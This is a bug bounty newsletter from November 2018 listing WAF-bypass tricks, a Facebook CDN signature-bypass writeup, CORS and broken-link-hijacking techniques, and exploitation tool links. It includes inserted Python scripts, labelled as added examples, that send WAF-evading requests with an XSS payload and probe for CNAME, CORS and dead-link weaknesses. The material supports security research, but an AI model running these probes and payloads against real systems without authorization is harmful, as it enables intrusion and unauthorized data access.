Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 23 to 30 November.
Our favorite 5 hacking items
1. Resource of the week
This is a cheat sheet of techniques for bypassing Web Application Firewalls. It might be useful and help you find bugs that others have missed.
Some of the techniques include sending two Host headers or two Content-Type headers, writing the HTTP method in lowercase, or separating the request-line tokens with tabs instead of spaces, etc.
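To make those three tricks concrete, here is an added example (not from the cheat sheet or the newsletter) that builds the raw requests by hand, since http.client would normalize the duplicates and the lowercase method away. The host, path and body are placeholders; the point is to send each variant and compare what the WAF blocks against what the origin accepts.

```python
"""Added example: build raw HTTP/1.1 requests that exercise a few of the
parser quirks listed in the WAF-bypass cheat sheet (duplicate Host or
Content-Type headers, lowercase method, tab as request-line separator).
Host/path/body below are placeholders, not values from the newsletter."""
import socket
import ssl


def build_request(method, path, headers, body="", sep=" "):
    """Serialize one request. `headers` is an ordered list of (name, value)
    pairs, so duplicate names are kept as-is; `sep` is the character placed
    between method, path and version on the request line."""
    payload = body.encode()
    hdrs = list(headers)
    if payload:
        hdrs.append(("Content-Length", str(len(payload))))
    hdrs.append(("Connection", "close"))
    head = f"{method}{sep}{path}{sep}HTTP/1.1\r\n"
    head += "".join(f"{name}: {value}\r\n" for name, value in hdrs)
    return (head + "\r\n").encode() + payload


def waf_bypass_variants(host, path, body,
                        content_type="application/x-www-form-urlencoded"):
    """One baseline POST plus four mutations. A WAF that honours the first
    Host/Content-Type while the origin honours the last (or vice versa), or
    that only matches an uppercase 'POST', may pass the body uninspected;
    comparing the responses tells you which side saw what."""
    base = [("Host", host), ("Content-Type", content_type)]
    return {
        "baseline": build_request("POST", path, base, body),
        # request line becomes 'post /path HTTP/1.1'
        "lowercase_method": build_request("post", path, base, body),
        # request line becomes 'POST\t/path\tHTTP/1.1'
        "tab_separator": build_request("POST", path, base, body, sep="\t"),
        # decoy Host first, real Host second
        "double_host": build_request("POST", path, [("Host", "localhost")] + base, body),
        # decoy Content-Type first, so a WAF may skip form-parameter parsing
        "double_content_type": build_request(
            "POST", path, [("Host", host), ("Content-Type", "text/plain"),
                           ("Content-Type", content_type)], body),
    }


def send_raw(request, host, port=443, use_tls=True, timeout=5):
    """Send one raw request and return the response status line."""
    raw = socket.create_connection((host, port), timeout=timeout)
    sock = (ssl.create_default_context().wrap_socket(raw, server_hostname=host)
            if use_tls else raw)
    with sock:
        sock.sendall(request)
        data = b""
        while chunk := sock.recv(4096):
            data += chunk
    return data.split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    # Placeholder target; only point this at a host you are authorized to test.
    variants = waf_bypass_variants("target.example", "/search",
                                   "q=<script>alert(1)</script>")
    for name, req in variants.items():
        print(f"--- {name}\n{req.decode()}")
        # e.g. print(name, send_raw(req, "target.example"))
```

Run it as-is to see the five requests on stdout; uncomment the `send_raw` line against an authorized target and a variant that returns a 200 where the baseline gets a 403 is your lead.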
2. Writeup of the week
I love how simple yet creative this finding is!
Facebook and Instagram store photos/videos on their CDN subdomains *.fbcdn.net. These URLs can't be accessed directly without their parameters ("Access denied" error), and hashes passed as GET parameters protect against request tampering (e.g. changing the file extension).
A workaround that bypasses all these checks is to request the same file through the host the subdomain's CNAME record points to, e.g. https://scontent.xx.fbcdn.net/t51.2885-15/12494762_1700832180174667_9131300789175210564_n.html:
instagram.fpnq2-1.fna.fbcdn.net. 3599 IN CNAME scontent.xx.fbcdn.net.
This allows access to any file while bypassing signature checks and without specifying any parameters. Even expired links are accessible!
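If you want to check a CDN for the same class of issue, the test is mechanical: fetch the signed URL, the same path with the query string stripped, and the stripped path again on the CNAME target. The added example below (not from the writeup) does that with the DNS lookup and HTTP fetch passed in as callables, so it runs offline against stubs; the sample URL, the stub responses and the hostnames in `__main__` are constructed, only the CNAME pair mirrors the record quoted above.

```python
"""Added example: check whether a signed CDN URL can be fetched unsigned via
the host its CNAME points to, as in the fbcdn.net writeup. The DNS lookup and
HTTP fetch are injected so the logic can run against stubs; the default
fetcher uses urllib. Sample URL and stub behaviour below are constructed."""
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit, urlunsplit
from urllib.request import Request, urlopen


def strip_query(url):
    """Drop the query string (where the signature/expiry parameters live)."""
    p = urlsplit(url)
    return urlunsplit((p.scheme, p.netloc, p.path, "", ""))


def swap_host(url, new_host):
    """Same scheme, path and query, different host."""
    p = urlsplit(url)
    return urlunsplit((p.scheme, new_host, p.path, p.query, p.fragment))


def http_status(url, timeout=10):
    """Default fetcher: HEAD the URL, return the status code (None on network error)."""
    try:
        with urlopen(Request(url, method="HEAD"), timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:
        return err.code
    except URLError:
        return None


def check_cname_bypass(signed_url, resolve_cname, fetch=http_status):
    """Probe three URLs: the signed one, the same path unsigned on the original
    host, and the unsigned path on the CNAME target. resolve_cname(host) must
    return the target hostname or None. A 200 only on the CNAME target means
    the signature check is enforced per edge hostname, not per object."""
    host = urlsplit(signed_url).hostname
    target = resolve_cname(host)
    unsigned = strip_query(signed_url)
    result = {
        "cname_target": target,
        "signed": fetch(signed_url),
        "unsigned_same_host": fetch(unsigned),
        "unsigned_cname_target": None,
    }
    if target and target.rstrip(".").lower() != host:
        result["unsigned_cname_target"] = fetch(swap_host(unsigned, target.rstrip(".")))
    result["bypass"] = (result["unsigned_cname_target"] == 200
                        and result["unsigned_same_host"] != 200)
    return result


if __name__ == "__main__":
    # Constructed stubs: a resolver mirroring the record quoted in the
    # writeup, and a fetcher that behaves like the CDN described there.
    records = {"instagram.fpnq2-1.fna.fbcdn.net": "scontent.xx.fbcdn.net."}

    def stub_fetch(url):
        if "://scontent.xx.fbcdn.net/" in url:
            return 200                     # CNAME target serves anything
        return 200 if "?" in url else 403  # edge name insists on the signature

    url = "https://instagram.fpnq2-1.fna.fbcdn.net/t51.2885-15/file_n.jpg?oh=sig&oe=5C0FFEE"
    print(check_cname_bypass(url, records.get, stub_fetch))
    # Live use: check_cname_bypass(url, my_resolver) with a CNAME resolver such as
    # dnspython's dns.resolver.resolve(host, "CNAME") (not in the standard library).
```

The standard library has no CNAME lookup, which is why the resolver is injected; `dig +short CNAME host` or dnspython both fit.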
3. Tool of the week
Broken Link Hijacking Burp Extension is a very nice addition to any bug hunter’s arsenal.
Every time a broken link is detected while you're testing a target, the extension reports it as an issue. You can then test each one for link hijacking, as explained in "Broken Link Hijacking - How expired links can be exploited." by @EdOverflow.
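The core of such a check is small enough to script yourself. The added example below (example code, not the extension's own) pulls external references out of a page and flags those whose host no longer resolves, putting active content first: a `<script src>` or `<link href>` on a domain anyone can re-register is the case that turns into stored XSS. The HTML and the resolver stub in `__main__` are constructed.

```python
"""Added example: the core of a broken-link-hijacking check. Collect external
references from a page, then flag the ones whose host does not resolve (a
domain that may be available to register). Not the extension's code; the
sample HTML and the resolver stub below are constructed."""
import socket
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# tag -> attribute carrying the URL
URL_ATTRS = {"a": "href", "script": "src", "link": "href", "img": "src", "iframe": "src"}


class LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []  # (tag, raw attribute value)

    def handle_starttag(self, tag, attrs):
        want = URL_ATTRS.get(tag)
        if want:
            for name, value in attrs:
                if name == want and value:
                    self.links.append((tag, value))


def external_links(page_url, html):
    """Absolute http(s) links whose host differs from the page's own."""
    collector = LinkCollector()
    collector.feed(html)
    own_host = urlsplit(page_url).hostname
    found = []
    for tag, raw in collector.links:
        absolute = urljoin(page_url, raw)  # resolves relative and '//host/...' forms
        parts = urlsplit(absolute)
        if parts.scheme in ("http", "https") and parts.hostname and parts.hostname != own_host:
            found.append((tag, absolute))
    return found


def host_resolves(host):
    """Default resolver: does the name resolve to any address at all?"""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False


def find_dead_links(page_url, html, resolves=host_resolves):
    """External links whose host does not resolve, most dangerous first:
    active content (script, link, iframe) before images and plain anchors."""
    rank = {"script": 0, "link": 1, "iframe": 2, "img": 3, "a": 4}
    dead = []
    for tag, url in external_links(page_url, html):
        host = urlsplit(url).hostname
        if not resolves(host):
            dead.append({"tag": tag, "url": url, "host": host})
    return sorted(dead, key=lambda d: rank[d["tag"]])


if __name__ == "__main__":
    page = "https://target.example/about"
    sample_html = """
    <a href="https://partner.example/blog">partner</a>
    <a href="/internal">internal</a>
    <script src="https://cdn.expired-vendor.example/widget.js"></script>
    <img src="//img.expired-vendor.example/logo.png">
    """
    gone = {"cdn.expired-vendor.example", "img.expired-vendor.example"}
    for hit in find_dead_links(page, sample_html, resolves=lambda h: h not in gone):
        print(hit)
```

A non-resolving host is only the first filter; before reporting, confirm the domain is actually unregistered (whois) rather than merely misconfigured, and for anchors consider whether the link is on a page users would trust.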
4. Article of the week
Wide use of HTTPS makes Man-in-The-Middle attacks harder to perform today. But they are still possible, as HTTPS can be bypassed if CORS, postMessage, HSTS and WebSockets are not used properly.
This article gives examples of what can go wrong and how HTTPS can be bypassed.
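The CORS part of that argument is easy to test for. The added example below (example code, not the article's) sends the handful of Origin values that matter and reports which ones come back allowed, and whether with credentials. The `http://` probe is the HTTPS-bypass case: if the HTTPS site trusts its own plaintext origin with credentials, an attacker on the network path only needs to control the victim's port-80 traffic to read authenticated responses. `attacker.example`, `target.example` and the stub server are constructed.

```python
"""Added example: probe a CORS endpoint with the origins that matter and
report which the server allows, with or without credentials. Example code,
not the article's; attacker.example and the stub server are constructed."""
from urllib.error import HTTPError
from urllib.parse import urlsplit
from urllib.request import Request, urlopen


def probe_origins(target_origin):
    """Origin header values to try against `target_origin` (scheme://host)."""
    host = urlsplit(target_origin).netloc
    return {
        "control": target_origin,                            # the site itself
        "arbitrary": "https://attacker.example",             # any origin reflected?
        "prefix_match": f"https://{host}.attacker.example",  # startswith() check
        "suffix_match": f"https://evil{host}",               # unanchored endswith()/regex
        "null": "null",                                      # sandboxed iframe, data: URL
        "http_downgrade": f"http://{host}",                  # same host, plaintext scheme
    }


def verdict(origin_sent, acao, acac):
    """Classify one response from its Access-Control-Allow-Origin and
    Access-Control-Allow-Credentials header values (None if absent)."""
    if acao is None:
        return "blocked"
    if acao.strip() == "*":
        return "wildcard"  # browsers never attach credentials to '*'
    if acao.strip() != origin_sent:
        return "blocked"
    creds = (acac or "").strip().lower() == "true"
    return "allowed_with_credentials" if creds else "allowed"


def assess_cors(target_origin, get_cors_headers):
    """get_cors_headers(origin) -> (acao, acac). Returns {probe: verdict}.
    Any probe other than 'control' that is allowed_with_credentials lets a
    page on that origin read the victim's authenticated responses."""
    return {kind: verdict(origin, *get_cors_headers(origin))
            for kind, origin in probe_origins(target_origin).items()}


def live_cors_headers(url, timeout=10):
    """Build a get_cors_headers() callable for a real endpoint using urllib."""
    def get(origin):
        try:
            with urlopen(Request(url, headers={"Origin": origin}), timeout=timeout) as resp:
                headers = resp.headers
        except HTTPError as err:
            headers = err.headers
        return (headers.get("Access-Control-Allow-Origin"),
                headers.get("Access-Control-Allow-Credentials"))
    return get


if __name__ == "__main__":
    # Constructed stub of a common misconfiguration: the server reflects any
    # origin whose host ends with its own name (unanchored suffix check),
    # accepts 'null', ignores the scheme, and always allows credentials.
    def leaky_server(origin):
        if origin == "null" or origin.endswith("target.example"):
            return origin, "true"
        return None, None

    for probe, result in assess_cors("https://target.example", leaky_server).items():
        print(f"{probe:15} {result}")
    # Live: assess_cors("https://target.example",
    #                   live_cors_headers("https://target.example/api/me"))
```

Read the result alongside the cookies: a reflected origin with credentials on an endpoint that returns user data is the exploitable case; without `Access-Control-Allow-Credentials: true` only unauthenticated content is exposed.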
5. Tutorial of the week
I always forget tcpdump and wireshark filters and syntax. So this list of 50 tcpdump recipes is very handy.
It includes things like: how to display only IPv6 traffic, how to filter traffic by IP, port, protocol or network, how to find HTTP hosts, cookies, user agents, cleartext passwords & more.
Other amazing things we stumbled upon this week
- Why Do Bug Bounty Hunters Do What They Do? We Asked Them.
- Darknet Diaries Ep 27: Chartbreakers
- The History of OWASP (S04E18)
- Unusual Gathering Podcast featuring Casey Ellis and Liz Wharton
- ZeroDayLive Episode 1- PhotoBox- When Stu Met Stuart
- Are Third-Party Vendors Your Biggest Cybersecurity Risk? — CyberSpeak Podcast
- Cybersecurity: Kerckhoffs’ Principle & why attack is the best form of defence
- 13 Life as an iOS Attacker (TenSec 2018)
Medium to advanced
- Escalating SSRF in a Vulnerable Jira Instance to RCE via Docker Engine API
- Impersonating users by abusing broken “Sign in with” implementations
- Fragmented SQL Injection Attacks – The Solution
- Learn vim For the Last Time
- Metasploit Basics, Part 21: Post Exploitation with mimikatz
- JAVA RMI (Remote Method Invocation) Exploitation with Metasploit Framework
- Cracking linux full disc encryption, luks with hashcat
- How to hunt insecure CORS…
- CORS attacks
- BBN challenge resolutions: “A properly secured parameter” and “Exploiting a static page”
- NodeJS SSRF by Response Splitting — ASIS CTF Finals 2018 — Proxy-Proxy Question Walkthrough
- Android Hook by Frida— ASIS CTF Final 2018 — Gunshop Questions Walkthrough
- PLC Bug Hunt
Pentest & Responsible disclosure writeups
Bug bounty writeups
- Stored XSS on HackerOne ($2,500)
- SQL injection on HackerOne
- Insufficient Session Expiration on HackerOne ($500)
- 2FA bypass on Instagram
- Logic flaw on Facebook ($750)
See more writeups on The list of bug bounty writeups.
If you don’t have time
- brute-sqlcipher: Bash script for brute-forcing encrypted sqlite databases (on mobile devices for example)
- weirdAAL: WeirdAAL (AWS Attack Library) & AWS EC2 instance userData
- EyeWitness updated: Get screenshots of websites and server header info, identify default credentials if possible. What’s new:
EyeWitness no longer has the "--headless", it now only has "--web" for web screenshots. This uses Firefox in the backend and runs it headlessly, so this will still work on a headless server!
More tools, if you have time
- Infection Monkey: Automated pentest tool / Open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement.
- XSShell: An XSS reverse shell framework in GO
- Shellver: Reverse Shell Cheat Sheet Tool
- CCAT (Cisco Config Analysis Tool): Tool which analyzes the configuration files of Cisco devices based on the Cisco Guide to Harden Cisco IOS Devices
Misc. pentest & bug bounty resources
- PHP Security Advent Calendar 2018
- fuzz.txt: Potentially dangerous files
- cloud_metadata.txt: Cloud Metadata Dictionary useful for SSRF Testing
- hak.lnk: Project “hak.lnk” - Resource Links For Hackers
- Free, online & interactive @teamKatacoda course on monitor mode, WPA cracking & tshark
- Reddit r/InfoSecInsiders
- List of Google Advanced Search Engine Queries/Dorks
- The Difference Between URLs and URIs
- Top 30 Penetration Tester (Pentester) Interview Questions and Answers for 2019
- Introducing Hacker Dashboard: Your personalized HackerOne overview: A personalized overview of your accepted & pending invitations for private programs, plus a feature to bookmark your favorite programs
- The Writable Files API: Simplifying local file access: Allows users to choose files or directories that a web app can interact with on the native file system
- Open Source: It’s turtles all the way down.: A hacker managed to become administrator of an open source NodeJS package by befriending its original developer, then injected malware to steal Bitcoin
- How to balance full-time work with creative projects
- Let’s talk 22nd century: human hacking & cloud security
Tweeted this week
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 11/23/2018 to 11/30/2018
Have a nice week folks!
If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.
And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…